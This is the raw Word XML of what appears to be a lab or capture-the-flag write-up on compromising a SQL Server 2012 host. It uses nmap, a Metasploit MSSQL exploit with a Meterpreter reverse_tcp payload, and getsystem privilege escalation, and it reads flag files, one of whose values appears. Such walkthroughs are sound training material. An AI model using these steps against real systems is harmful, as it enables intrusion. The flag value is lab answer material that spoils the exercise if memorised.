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D91F" w14:textId="77777777" w:rsidR="000F4C23" w:rsidRPr="000F4C23" w:rsidRDefault="000F4C23" w:rsidP="000F4C23">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F4C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74544B7B" w14:textId="77777777" w:rsidR="000F4C23" w:rsidRPr="000F4C23" w:rsidRDefault="000F4C23" w:rsidP="000F4C23">
      <w:r w:rsidRPr="000F4C23">
        <w:t>In this lab environment, you will have GUI access to a Kali machine. The target machine will be accessible at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000F4C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000F4C23">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E0A9FD" w14:textId="77777777" w:rsidR="000F4C23" w:rsidRPr="000F4C23" w:rsidRDefault="000F4C23" w:rsidP="000F4C23">
      <w:r w:rsidRPr="000F4C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4C23">
        <w:t> Use Metasploit and manual investigation techniques to capture the following flags:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E635F0" w14:textId="77777777" w:rsidR="000F4C23" w:rsidRDefault="000F4C23" w:rsidP="000F4C23">
      <w:r w:rsidRPr="000F4C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4C23">
        <w:t> Gain access to the MSSQLSERVER account on the target machine to retrieve the first flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DACA9C" w14:textId="63B2F63F" w:rsidR="000F4C23" w:rsidRPr="000F4C23" w:rsidRDefault="000F4C23" w:rsidP="000F4C23">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F4C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353318A7" w14:textId="745902E4" w:rsidR="000F4C23" w:rsidRDefault="00745534" w:rsidP="000F4C23">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00745534">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00745534">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00745534">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00745534">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00745534">
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00745534">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00745534">
        <w:t>target.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00745534">
        <w:t xml:space="preserve"> --min-rate 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087F4636" w14:textId="6FCE4985" w:rsidR="00745534" w:rsidRDefault="00745534" w:rsidP="000F4C23">
      <w:r w:rsidRPr="00745534">
        <w:t xml:space="preserve">minimum packet rate of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00745534">
        <w:t>1000 (-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00745534">
        <w:t>-min-rate 1000) to speed up the scan</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B203B95" w14:textId="0FBEBAD9" w:rsidR="00745534" w:rsidRDefault="00745534" w:rsidP="000F4C23">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00745534">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Default Microsoft SQL Server (MSSQL) listens </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00745534">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00745534">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> TCP 1433.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494BAE8F" w14:textId="25D80BDB" w:rsidR="00745534" w:rsidRDefault="00712123" w:rsidP="000F4C23">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00712123">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UDP 1434 — SQL Server Browser service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A68242C" w14:textId="77777777" w:rsidR="00712123" w:rsidRDefault="00712123" w:rsidP="000F4C23"/>
    <w:p w14:paraId="5CF0919E" w14:textId="2956372D" w:rsidR="00712123" w:rsidRPr="00712123" w:rsidRDefault="00712123" w:rsidP="000F4C23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B8F7477" wp14:editId="6350287A">
            <wp:extent cx="5943600" cy="4409440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16622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2751" name="Picture 1662202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CA54" w14:textId="77777777" w:rsidR="000F4C23" w:rsidRDefault="000F4C23" w:rsidP="000F4C23"/>
    <w:p w14:paraId="5AACCE39" w14:textId="2EE417CB" w:rsidR="00712123" w:rsidRDefault="00712123" w:rsidP="000F4C23">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00712123">
        <w:lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00712123">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MSSQL Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00712123">
        <w:t> is running on </w:t>
      </w:r>
      <w:r w:rsidRPr="00712123">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>port 1433</w:t>
      </w:r>
      <w:r w:rsidRPr="00712123">
        <w:t>, and the version is </w:t>
      </w:r>
      <w:r w:rsidRPr="00712123">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL Server 2012 (11.00.6020.00; SP3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B2089E" w14:textId="77777777" w:rsidR="00712123" w:rsidRDefault="00712123" w:rsidP="000F4C23"/>
    <w:p w14:paraId="26ED61AA" w14:textId="51CBA875" w:rsidR="00712123" w:rsidRDefault="00712123" w:rsidP="000F4C23">
      <w:r>
        <w:t>Search for it’s exploit on the bases of version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640BBEB9" w14:textId="6FFD5473" w:rsidR="00712123" w:rsidRDefault="00712123" w:rsidP="000F4C23">
      <w:r>
        <w:t>Use Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F73D90B" w14:textId="61F7C5C8" w:rsidR="00712123" w:rsidRDefault="00712123" w:rsidP="000F4C23">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29617EF7" w14:textId="0FA70EC2" w:rsidR="00712123" w:rsidRDefault="00712123" w:rsidP="000F4C23">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mssql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2012</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C50727" w14:textId="09F34979" w:rsidR="00712123" w:rsidRDefault="00712123" w:rsidP="000F4C23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55564F31" wp14:editId="4649B96E">
            <wp:extent cx="5943600" cy="3317240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="119900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4917" name="Picture 1199004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67B0" w14:textId="20E8A622" w:rsidR="00712123" w:rsidRDefault="00712123" w:rsidP="000F4C23">
      <w:r>
        <w:t>Select the 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00712123">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> one use 0 and then use info command to get more details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0859A78E" w14:textId="56C3633A" w:rsidR="00712123" w:rsidRDefault="00712123" w:rsidP="000F4C23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="20C29C96" wp14:editId="62B09C48">
            <wp:extent cx="5943600" cy="741680"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="69568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5940" name="Picture 695685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3EFD" w14:textId="682B9FFC" w:rsidR="00712123" w:rsidRDefault="00712123" w:rsidP="000F4C23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CA574B0" wp14:editId="558A3B69">
            <wp:extent cx="5943600" cy="2450465"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="673205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05709" name="Picture 673205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2323" w14:textId="54A6DC9D" w:rsidR="00712123" w:rsidRDefault="00712123" w:rsidP="000F4C23">
      <w:r w:rsidRPr="00712123">
        <w:t> The description confirms that this exploit has been tested on </w:t>
      </w:r>
      <w:r w:rsidRPr="00712123">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SQL Server 2012</w:t>
      </w:r>
      <w:r w:rsidRPr="00712123">
        <w:t>, so it is suitable for our target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0EFA6E" w14:textId="2089B9AC" w:rsidR="00712123" w:rsidRDefault="00712123" w:rsidP="000F4C23">
      <w:r>
        <w:t xml:space="preserve">Set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>target.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5C9A4A71" w14:textId="38C3ACF8" w:rsidR="00712123" w:rsidRDefault="00712123" w:rsidP="000F4C23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45CF7A03" wp14:editId="709DB33F">
            <wp:extent cx="5943600" cy="2599690"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="782601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1475" name="Picture 782601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239B" w14:textId="411017ED" w:rsidR="00712123" w:rsidRDefault="00712123" w:rsidP="000F4C23">
      <w:r>
        <w:t xml:space="preserve">If this type of thing occurs and no session </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>created</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> then change the payload to the same as the target payload architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFA12F4" w14:textId="3D2F81AC" w:rsidR="00712123" w:rsidRDefault="00712123" w:rsidP="000F4C23">
      <w:r w:rsidRPr="00712123">
        <w:t>Since the exploit supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00712123">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>x86</w:t>
      </w:r>
      <w:r w:rsidRPr="00712123">
        <w:t> architecture, but we are targeting a </w:t>
      </w:r>
      <w:r w:rsidRPr="00712123">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>64-bit</w:t>
      </w:r>
      <w:r w:rsidRPr="00712123">
        <w:t> system, we need to set a compatible payload. To change the payload to </w:t>
      </w:r>
      <w:r w:rsidRPr="00712123">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>x64</w:t>
      </w:r>
      <w:r w:rsidRPr="00712123">
        <w:t> architecture, use the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8F0571" w14:textId="7AF8B3AC" w:rsidR="00712123" w:rsidRDefault="00712123" w:rsidP="000F4C23">
      <w:r w:rsidRPr="00712123">
        <w:t>set PAYLOAD windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00712123">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00712123">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00712123">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3982EE30" w14:textId="4B795583" w:rsidR="00712123" w:rsidRDefault="00712123" w:rsidP="000F4C23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08D26054" wp14:editId="5CA9444A">
            <wp:extent cx="5943600" cy="3970655"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1343613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3892" name="Picture 13436138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5F9" w14:textId="70C3C757" w:rsidR="00712123" w:rsidRDefault="00712123" w:rsidP="000F4C23">
      <w:r>
        <w:t xml:space="preserve">Now we get </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59100F31" w14:textId="01508294" w:rsidR="00712123" w:rsidRDefault="00712123" w:rsidP="000F4C23">
      <w:r w:rsidRPr="00712123">
        <w:t xml:space="preserve"> To make the session more interactive, type the following </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00712123">
        <w:t>command:shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="517BFFEF" w14:textId="4AC86B04" w:rsidR="00712123" w:rsidRDefault="00FA5979" w:rsidP="000F4C23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05BE6687" wp14:editId="063D373E">
            <wp:extent cx="4464279" cy="1181161"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1720548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8837" name="Picture 1720548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B06D" w14:textId="0A0D24DF" w:rsidR="00FA5979" w:rsidRDefault="00FA5979" w:rsidP="000F4C23">
      <w:r w:rsidRPr="00FA5979">
        <w:t xml:space="preserve">navigate to the C drive by </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00FA5979">
        <w:t>typing:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FA5979">
        <w:t xml:space="preserve"> cd C:\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F23156" w14:textId="3DA4A506" w:rsidR="00FA5979" w:rsidRDefault="00FA5979" w:rsidP="000F4C23">
      <w:r w:rsidRPr="00FA5979">
        <w:t>list the contents of the directory to find the file that contains the flag: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FA5979">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6803CC1B" w14:textId="7EA4A2E9" w:rsidR="00FA5979" w:rsidRDefault="00FA5979" w:rsidP="000F4C23">
      <w:r>
        <w:t xml:space="preserve">type flag1.txt to see </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>it’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5FBF79" w14:textId="3595FF20" w:rsidR="00FA5979" w:rsidRDefault="00FA5979" w:rsidP="000F4C23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56694098" wp14:editId="11E5DECA">
            <wp:extent cx="4959605" cy="3797495"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2047029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9897" name="Picture 20470298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EB05" w14:textId="7300F38B" w:rsidR="00FA5979" w:rsidRDefault="00FA5979" w:rsidP="000F4C23">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5979">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag: b9ac970a1d6a42f3bd860334a4ccba4d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72835C92" w14:textId="2BAD1B7B" w:rsidR="0093026E" w:rsidRPr="000F4C23" w:rsidRDefault="0093026E" w:rsidP="000F4C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03FDAD" wp14:editId="01DAEF73">
            <wp:extent cx="4381725" cy="831893"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="187867993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993" name="Picture 9" descr="A black background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08AA" w14:textId="77777777" w:rsidR="000F4C23" w:rsidRDefault="000F4C23" w:rsidP="000F4C23">
      <w:r w:rsidRPr="000F4C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4C23">
        <w:t> Locate the second flag within the Windows configuration folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A50D2E" w14:textId="77777777" w:rsidR="000F4C23" w:rsidRPr="000F4C23" w:rsidRDefault="000F4C23" w:rsidP="000F4C23">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F4C23">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F19CA8C" w14:textId="77777777" w:rsidR="008B1D4C" w:rsidRDefault="008B1D4C" w:rsidP="000F4C23">
      <w:r w:rsidRPr="008B1D4C">
        <w:t>check the </w:t>
      </w:r>
      <w:r w:rsidRPr="008B1D4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows configuration folder</w:t>
      </w:r>
      <w:r w:rsidRPr="008B1D4C">
        <w:t xml:space="preserve">, which is usually found in the System32 directory. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0861A935" w14:textId="78B912F9" w:rsidR="000F4C23" w:rsidRDefault="008B1D4C" w:rsidP="000F4C23">
      <w:r w:rsidRPr="008B1D4C">
        <w:t>cd Windows\System32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B841225" w14:textId="77777777" w:rsidR="008B1D4C" w:rsidRDefault="008B1D4C" w:rsidP="000F4C23"/>
    <w:p w14:paraId="1A3B5B61" w14:textId="4E5515A1" w:rsidR="008B1D4C" w:rsidRDefault="008B1D4C" w:rsidP="000F4C23">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B1D4C">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B1D4C">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008B1D4C">
        <w:t>a:d</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008B1D4C">
        <w:t xml:space="preserve"> — show </w:t>
      </w:r>
      <w:r w:rsidRPr="008B1D4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>only directories</w:t>
      </w:r>
      <w:r w:rsidRPr="008B1D4C">
        <w:t xml:space="preserve"> (including hidden/system </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008B1D4C">
        <w:t>dirs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008B1D4C">
        <w:t>) in the current folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D05811" w14:textId="67231890" w:rsidR="008B1D4C" w:rsidRDefault="00F31D7C" w:rsidP="000F4C23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="487231EA" wp14:editId="58E73D54">
            <wp:extent cx="4769095" cy="2419474"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10243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9806" name="Picture 10243798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3A78" w14:textId="399D2A37" w:rsidR="00F31D7C" w:rsidRDefault="00F31D7C" w:rsidP="000F4C23">
      <w:r w:rsidRPr="00F31D7C">
        <w:t xml:space="preserve"> navigate into </w:t>
      </w:r>
      <w:r w:rsidRPr="00F31D7C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>config</w:t>
      </w:r>
      <w:r w:rsidRPr="00F31D7C">
        <w:t xml:space="preserve"> using the cd command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD5B979" w14:textId="6F7A5F38" w:rsidR="008B1D4C" w:rsidRDefault="00F31D7C" w:rsidP="000F4C23">
      <w:r>
        <w:t>Cd config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2B2351" w14:textId="362EA6B1" w:rsidR="00F31D7C" w:rsidRDefault="00F31D7C" w:rsidP="000F4C23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36BDA17A" wp14:editId="7891C8BA">
            <wp:extent cx="3867349" cy="603281"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="2115260685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0685" name="Picture 2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6FBD" w14:textId="0FDD1B63" w:rsidR="00F31D7C" w:rsidRDefault="00F31D7C" w:rsidP="000F4C23">
      <w:r w:rsidRPr="00F31D7C">
        <w:t>Let’s get back to our Meterpreter session by using </w:t>
      </w:r>
      <w:r w:rsidRPr="00F31D7C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ctrl + C</w:t>
      </w:r>
      <w:r w:rsidRPr="00F31D7C">
        <w:t>. Then, type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F31D7C">
        <w:t>getprivs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F31D7C">
        <w:t xml:space="preserve"> to view </w:t>
      </w:r>
      <w:r w:rsidRPr="00F31D7C">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>current</w:t>
      </w:r>
      <w:r w:rsidRPr="00F31D7C">
        <w:t xml:space="preserve"> user</w:t>
      </w:r>
      <w:r w:rsidRPr="00F31D7C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F31D7C">
        <w:t>privileges</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2E5378" w14:textId="127D1DD1" w:rsidR="00F31D7C" w:rsidRDefault="00F31D7C" w:rsidP="000F4C23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64ED906C" wp14:editId="59C191CB">
            <wp:extent cx="4038808" cy="2063856"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2122478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8676" name="Picture 21224786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D50B" w14:textId="0701AF36" w:rsidR="00F31D7C" w:rsidRDefault="00F31D7C" w:rsidP="000F4C23">
      <w:r w:rsidRPr="00F31D7C">
        <w:t>We can use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F31D7C">
        <w:t>getsystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F31D7C">
        <w:t> to elevate the privileges because if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F31D7C">
        <w:t>SeImpersonatePrivilege</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F31D7C">
        <w:t> is present</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587EE24B" w14:textId="176618BD" w:rsidR="00F31D7C" w:rsidRDefault="00F31D7C" w:rsidP="000F4C23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42CFC99A" wp14:editId="443C394F">
            <wp:extent cx="5943600" cy="500380"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1074467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7005" name="Picture 10744670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F82B" w14:textId="4FCE2E4A" w:rsidR="00F31D7C" w:rsidRDefault="00F31D7C" w:rsidP="000F4C23">
      <w:r w:rsidRPr="00F31D7C">
        <w:t>We have elevated our privileges. Now, we can use the shell command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1047781C" w14:textId="1BD30DAD" w:rsidR="00F31D7C" w:rsidRDefault="00104553" w:rsidP="000F4C23">
      <w:r>
        <w:t xml:space="preserve">Shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671221A0" w14:textId="611F4AC0" w:rsidR="00104553" w:rsidRDefault="00104553" w:rsidP="000F4C23">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Cd config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118E470D" w14:textId="09A3AC35" w:rsidR="00104553" w:rsidRDefault="00104553" w:rsidP="000F4C23">
      <w:r>
        <w:t>Dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2B7733" w14:textId="16FD6233" w:rsidR="00104553" w:rsidRDefault="00104553" w:rsidP="000F4C23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11ACF348" wp14:editId="4BB554CD">
            <wp:extent cx="5505733" cy="2971953"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1126506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6689" name="Picture 11265066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5C9" w14:textId="77777777" w:rsidR="00104553" w:rsidRDefault="00104553" w:rsidP="000F4C23"/>
    <w:p w14:paraId="1D3D3D0C" w14:textId="6BB6534E" w:rsidR="00104553" w:rsidRDefault="00104553" w:rsidP="000F4C23">
      <w:r>
        <w:t>Type flag2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AD5A9F" w14:textId="41704B98" w:rsidR="00104553" w:rsidRDefault="00104553" w:rsidP="000F4C23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C10CB4E" wp14:editId="09983ABC">
            <wp:extent cx="4222967" cy="685835"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
